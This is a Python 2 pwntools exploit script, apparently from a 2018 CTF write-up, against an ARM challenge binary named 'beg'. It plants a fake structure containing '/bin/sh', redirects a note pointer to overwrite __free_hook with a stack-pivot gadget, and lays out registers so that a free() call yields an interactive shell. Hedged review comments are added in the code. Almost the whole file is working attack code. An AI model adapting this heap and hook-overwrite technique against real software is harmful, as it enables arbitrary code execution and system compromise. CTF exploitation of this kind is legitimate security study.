#!/usr/bin/env python2
# encoding: utf-8
#
# pwntools driver for the "beg" challenge binary (CTF write-up, 2018).
#
# Python 2 only: it uses the `print` statement and concatenates str with
# the bytes returned by p32(), neither of which works unchanged on Python 3.
#
# Everything below is tied to one specific build of the target: the menu
# prompts ("title : ", "id : ", "message : ", "> ") and the absolute
# addresses are hard-coded.  Nothing about the binary's layout can be
# verified from this file alone, so the structural comments are hedged.
from pwn import *   # wildcard import: ELF, process, remote, p32, log, context come from here
import sys
import ctypes            # NOTE(review): imported but never used in this script
from time import sleep   # NOTE(review): imported but never used in this script
# Talk to a local process unless "remote" appears on the command line.
LOCAL = "remote" not in sys.argv
BINARY = "beg"
elf = ELF(BINARY)
# "debug" on the command line enables pwntools' full I/O tracing.
context.log_level = "debug" if "debug" in sys.argv else "info"
#context.terminal = ['urxvt', '-geometry', '160x60', '-e', 'sh', '-c']
context.terminal = ['tmux', 'splitw', '-h', '-l', '120']
# Take arch/bits/endianness from the ELF so p32() packs for the target (ARM, per the comments below).
context.update(binary=elf)
#libc = ELF("libc.so")
#rop = ELF("libc.so")
#binsh = next(libc.search("/bin/sh"))
if LOCAL:
    r = process(BINARY)
else:
    r = remote("10.13.37.68", 1234)   # challenge host/port, hard-coded
# Absolute addresses for this build.  Fixed addresses like these only make
# sense if the binary and libc are loaded at predictable locations (no PIE /
# no ASLR) — TODO confirm against the ELF headers and the challenge setup.
# A "+ 1" on an address marks it as thumb-mode code (low bit set).
dopivot = 0x17e0c
# ^ this is in non-thumb : ldmib r0!, {r3, r4, r5, r6, r7, r8, r9, sl, ip, sp, lr, pc}
free_hook = 0x7c510
free_ptr = free_hook-8
name_addr = 0x7c804   # presumably where the "name" input sent first is stored; verify against the binary
svc = 0x22134 + 1 # in thumb
# Data sent as the name.  The author's later comment calls it a fake
# structure; the field order is assumed to mirror the target's own record
# layout and cannot be checked from here.
fakebug = p32(10) + "/bin/sh\x00" + p32(name_addr+5*4) + p32(free_ptr)
fakebug += p32(name_addr+7*4)+p32(0)+p32(0x616263)+ p32(name_addr+4)+p32(0)*2+"dddd"+p32(svc)
print r.readuntil(": ")
r.sendline(fakebug)
# Initial registration prompts; values are arbitrary.
r.sendlineafter("title : ", "test")
r.sendlineafter("requested : ", "123")
r.sendlineafter("ion) : ", "test")
r.readuntil("> ")
# Menu option "3" four times with a plain message, then a fifth time with a
# message that carries two pointers (name_addr+5*4 and name_addr).
for x in range(4):
    r.sendline("3")
    r.sendlineafter("id : ", "1")
    r.sendlineafter("message : ", "Please Sir")
r.sendline("3")
r.sendlineafter("id : ", "1")
# Now last note points to our fake structure (name)
r.sendlineafter("message : ", "Please Siraa"+p32(name_addr+5*4)+p32(name_addr))
print r.readuntil("> ")
log.info(" pointing to __free_hook ")
# Menu option "1" with placeholder values.
r.sendline("1")
r.sendlineafter("title : ", "junk")
r.sendlineafter("requested : ", str("1234"))   # str() on a literal is a no-op
r.sendlineafter(") : ", "junk")
#Let's trash __free_hook with our money value :
log.info(" overwriting __free_hook ")
r.readuntil("> ")
r.sendline("1")
r.sendlineafter("title : ", "yolo")
# The "requested" amount is the gadget address sent as a decimal string.
r.sendlineafter("requested : ", str(dopivot))
r.sendlineafter(") : ", "yolo")
r.readuntil("> ")
r.sendline("3")
r.sendlineafter("id : ", "1")
# Block of 32-bit values laid out for the ldmib gadget commented above:
# newsp and popreg2 (another thumb-mode address) are the meaningful entries,
# the remaining words look like placeholders.  Exact register mapping is the
# author's and is not verifiable from this file.
newsp = name_addr+8*4
popreg2 = 0x10144+1
popregs = p32(0xaaaaaaaa)+p32(0xbbbbbbbb)+p32(0xb)+"eeeeffffgggghhhh"+p32(newsp)+"jjjj"+p32(popreg2)
log.info(" triggering free ")
r.sendlineafter("message : ", "Please Siraa"+popregs)
log.info('Getting shell...')
#r.sendline("cat flag*;")
# Hand the connection to the user; close() runs only after interactive() returns.
r.interactive()
r.close()